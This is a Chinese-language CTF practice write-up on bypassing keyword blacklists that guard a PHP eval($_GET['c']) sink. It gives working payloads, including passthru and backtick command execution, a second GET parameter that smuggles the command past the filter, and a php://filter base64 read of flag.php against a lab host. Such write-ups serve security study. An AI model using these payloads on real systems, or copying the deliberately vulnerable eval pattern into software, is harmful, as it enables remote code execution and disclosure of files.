RCE的另外一些绕过练习

目录

被过滤了flag怎么办

方法

结果

过滤了flag、php、system

方法一

结果

​编辑

方法二

[过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行](#过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行)

方法一

方法二

相对于上面一道题来说多过滤了一个括号

方法一


被过滤了flag怎么办

php 复制代码
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

方法

php 复制代码
?c=system('cat fla*');

结果

过滤了flag、php、system

php 复制代码
 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
} 

方法一

php 复制代码
?c=echo%20`cat%20fla*`;

结果

方法二

php 复制代码
?c=passthru('cat fla*');

过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行

php 复制代码
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
} 

方法一

php 复制代码
http://192.168.244.152:8080/web.php?c=passthru($_GET[A]);&A=cat%20flag.php

方法二

php 复制代码
http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php

相对于上面一道题来说多过滤了一个括号

php 复制代码
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
} 

方法一

php 复制代码
http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php
相关推荐
学习溢出11 分钟前
【网络安全】逆向工程 练习示例
网络·安全·网络安全·渗透测试·逆向工程
黑客Jack12 分钟前
网络安全加密
安全·web安全·php
vortex52 小时前
Burp与其他安全工具联动及代理设置教程
网络·安全
xserver23 小时前
ensp 基于端口安全的财务部网络组建
网络·安全
龙哥·三年风水3 小时前
workman服务端开发模式-应用开发-后端api推送修改二
分布式·gateway·php
计算机徐师兄4 小时前
基于TP5框架的家具购物小程序的设计与实现【附源码、文档】
小程序·php·家具购物小程序·家具购物微信小程序·家具购物
x66ccff5 小时前
HTTPS如何通过CA证书实现安全通信,以及HTTPS的局限性
网络协议·安全·https
梁小憨憨5 小时前
机器学习(Machine Learning)的安全问题
人工智能·安全·机器学习
希雅不是希望5 小时前
Ubuntu命令行网络配置
网络·ubuntu·php
龙哥·三年风水7 小时前
workman服务端开发模式-应用开发-后端api推送修改一
分布式·gateway·php